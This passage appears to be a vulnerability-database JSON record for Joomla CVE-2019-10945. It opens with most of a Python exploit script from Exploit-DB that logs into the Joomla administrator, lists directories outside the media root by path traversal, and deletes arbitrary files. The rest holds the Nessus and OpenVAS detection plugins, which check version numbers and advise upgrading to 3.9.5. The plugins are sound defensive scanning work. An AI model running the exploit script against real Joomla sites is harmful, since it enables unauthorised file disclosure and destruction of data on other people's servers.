lxml\")\r\n exit(0)\r\n\r\nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\"\r\n\r\nprint ''' \r\n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Web Site: Haboob.sa\r\n# Email: research@haboob.sa\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \r\n _ _ ____ ____ ____ ____ \r\n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \r\n| |__| | / \\ | |_) | | | | | | | |_) |\r\n| __ | / /\\ \\ | _ <| | | | | | | _ < \r\n| | | |/ ____ \\| |_) | |__| | |__| | |_) |\r\n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \r\n \r\n'''\r\nclass URL(click.ParamType):\r\n name = 'url'\r\n regex = re.compile(\r\n r'^(?:http)s?://' # http:// or https://\r\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\r\n r'localhost|' # localhost...\r\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\r\n r'(?::\\d+)?' # optional port\r\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\r\n\r\n def convert(self, value, param, ctx):\r\n if not isinstance(value, tuple):\r\n if re.match(self.regex, value) is None:\r\n self.fail('invalid URL (%s)' % value, param, ctx)\r\n return value\r\n\r\n\r\ndef getForm(url, query, cookie=''):\r\n r = requests.get(url, cookies=cookie, timeout=5)\r\n if r.status_code != 200:\r\n print(\"invalid URL: 404 NOT FOUND!!\")\r\n exit(0)\r\n page = r.text.encode('utf-8')\r\n html = lxml.html.fromstring(page)\r\n return html.xpath(query), r.cookies\r\n\r\n\r\ndef login(url, username, password):\r\n csrf, cookie = getForm(url, '//input/@name')\r\n postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',\r\n 'return': 'aW5kZXgucGhw', csrf[-1]: 1}\r\n\r\n res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)\r\n if res.status_code == 200:\r\n html = lxml.html.fromstring(res.text)\r\n msg = html.xpath(\"//div[@class='alert-message']/text()[1]\")\r\n print msg\r\n exit()\r\n else:\r\n get_cookies(res.cookies.get_dict(), url, username, password)\r\n\r\n\r\ndef save_cookies(requests_cookiejar, filename):\r\n with open(filename, 'wb') as f:\r\n pickle.dump(requests_cookiejar, f)\r\n\r\n\r\ndef load_cookies(filename):\r\n with open(filename, 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef cookies_file_name(url, username, password):\r\n result = hashlib.md5(str(url) + str(username) + str(password))\r\n _dir = tempfile.gettempdir()\r\n return _dir + \"/\" + result.hexdigest() + \".Jcookie\"\r\n\r\n\r\ndef get_cookies(req_cookie, url, username, password):\r\n cookie_file = cookies_file_name(url, username, password)\r\n if os.path.isfile(cookie_file):\r\n return load_cookies(cookie_file)\r\n else:\r\n save_cookies(req_cookie, cookie_file)\r\n return req_cookie\r\n\r\n\r\ndef traversal(url, username, password, dir=None):\r\n cookie = get_cookies('', url, username, password)\r\n url = url + mediaList + dir\r\n files, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie)\r\n for file in files:\r\n print file\r\n pass\r\n\r\n\r\ndef removeFile(baseurl, username, password, dir='', file=''):\r\n cookie = get_cookies('', baseurl, username, password)\r\n url = baseurl + mediaList + dir\r\n link, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie)\r\n if link:\r\n link = urllib.unquote(link[0].encode(\"utf8\"))\r\n link = link.split('folder=')[0]\r\n link = link.replace(\"folder.delete\", \"file.delete\")\r\n link = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file\r\n msg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie)\r\n if len(msg) == 0:\r\n print \"ERROR : File does not exist\"\r\n else:\r\n print msg\r\n else:\r\n print \"ERROR:404 NOT FOUND!!\"\r\n\r\n\r\n@click.group(invoke_without_command=True)\r\n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True)\r\n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True)\r\n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True)\r\n@click.option('--dir', type=str, help=\"listing directory\")\r\n@click.option('--rm', type=str, help=\"delete file\")\r\n@click.pass_context\r\ndef cli(ctx, url, username, password, dir, rm):\r\n url = url+\"/\"\r\n cookie_file = cookies_file_name(url, username, password)\r\n if not os.path.isfile(cookie_file):\r\n login(url, username, password)\r\n if dir is not None:\r\n dir = dir.lstrip('/')\r\n dir = dir.rstrip('/')\r\n dir = \"/\" + dir\r\n if dir == \"/\" or dir == \"../\" or dir == \"/.\":\r\n dir = ''\r\n else:\r\n dir = ''\r\n print dir\r\n if rm is not None:\r\n removeFile(url, username, password, dir, rm)\r\n else:\r\n traversal(url, username, password, dir)\r\n\r\n\r\ncli()", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46710"}], "nessus": [{"lastseen": "2021-03-01T03:35:35", "description": "According to its self-reported version number, the Joomla! installation running on the remote web server is 1.5.0 or\nlater but prior to 3.9.5. It is, therefore, affected by multiple vulnerabilities:\n\n - A directory traversal vulnerability exists in versions 1.5.0 to 3.9.4 within the Media Manager component \n due to improperly sanitizing the folder parameter. An authenticated, remote attacker can exploit this, by\n sending a URI that contains directory traversal characters, to disclose the contents of files located\n outside of the server's restricted path. (CVE-2019-10945)\n\n - An access control limit bypass exists in versions 3.2.0 to 3.9.4 within the gethelpsites() function of the\n com_users component. An unauthenticated, remote attacker can exploit this and access the 'refresh list of\n helpsites' endpoint. (CVE-2019-10946)\n\n - A cross-site scripting (XSS) vulnerability exists in versions 3.0.0 to 3.9.4 due to improper validation of\n user-supplied input before returning it to users. An unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser\n session.\n\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "Joomla! 1.5.0 < 3.9.5 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10946", "CVE-2019-10945"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_395.NASL", "href": "https://www.tenable.com/plugins/nessus/123954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123954);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/30 13:24:46\");\n\n script_cve_id(\"CVE-2019-10945\", \"CVE-2019-10946\");\n\n script_name(english:\"Joomla! 1.5.0 < 3.9.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla! installation running on the remote web server is 1.5.0 or\nlater but prior to 3.9.5. It is, therefore, affected by multiple vulnerabilities:\n\n - A directory traversal vulnerability exists in versions 1.5.0 to 3.9.4 within the Media Manager component \n due to improperly sanitizing the folder parameter. An authenticated, remote attacker can exploit this, by\n sending a URI that contains directory traversal characters, to disclose the contents of files located\n outside of the server's restricted path. (CVE-2019-10945)\n\n - An access control limit bypass exists in versions 3.2.0 to 3.9.4 within the gethelpsites() function of the\n com_users component. An unauthenticated, remote attacker can exploit this and access the 'refresh list of\n helpsites' endpoint. (CVE-2019-10946)\n\n - A cross-site scripting (XSS) vulnerability exists in versions 3.0.0 to 3.9.4 due to improper validation of\n user-supplied input before returning it to users. An unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser\n session.\n\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5764-joomla-3-9-5-release.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fe75ad0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.9.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10945\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_info = vcf::get_app_info(app:\"Joomla!\", port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"1.5.0\", \"fixed_version\" : \"3.9.5\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags: {xss:true});\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-09T14:36:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11358", "CVE-2019-10946", "CVE-2019-10945"], "description": "Joomla! is prone to multiple vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2019-04-15T00:00:00", "id": "OPENVAS:1361412562310113369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113369", "type": "openvas", "title": "Joomla < 3.9.5 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113369\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-15 11:12:47 +0000 (Mon, 15 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2019-10945\", \"CVE-2019-10946\", \"CVE-2019-11358\");\n\n script_name(\"Joomla < 3.9.5 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_mandatory_keys(\"joomla/installed\");\n\n script_tag(name:\"summary\", value:\"Joomla! is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The Media Manager component does not properly sanitize the folder parameter,\n allowing attackers to act outside the media manager root directory\n\n - The 'refresh list of helpsites' endpoint of com_users lacks access checks,\n allowing calls from unauthenticated users\n\n - The $.extend method of JQuery is vulnerable to Object.prototype pollution attacks (CVE-2019-11358)\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to access sensitive information\n or execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Joomla! through version 3.9.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.9.5.\");\n\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/778-20190402-core-helpsites-refresh-endpoint-callable-for-unauthenticated-users\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:joomla:joomla\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.9.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.9.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
